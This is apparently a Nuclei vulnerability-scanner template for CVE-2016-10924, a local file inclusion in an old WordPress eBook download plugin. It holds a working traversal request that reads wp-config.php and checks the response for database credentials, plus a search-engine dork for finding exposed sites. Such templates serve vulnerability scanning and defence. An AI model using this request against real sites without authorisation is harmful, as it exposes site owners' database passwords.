nuclei-templates/cves/2016/CVE-2016-10924.yaml

42 lines
1.2 KiB
YAML

id: CVE-2016-10924
info:
name: Wordpress Zedna eBook download <1.2 - Local File Inclusion
author: idealphase
severity: high
description: |
Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
reference:
- https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
- https://www.exploit-db.com/exploits/39575
- https://nvd.nist.gov/vuln/detail/CVE-2016-10924
- https://wordpress.org/plugins/ebook-download/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10924
cwe-id: CWE-22
metadata:
google-query: inurl:"/wp-content/plugins/ebook-download"
tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/06/17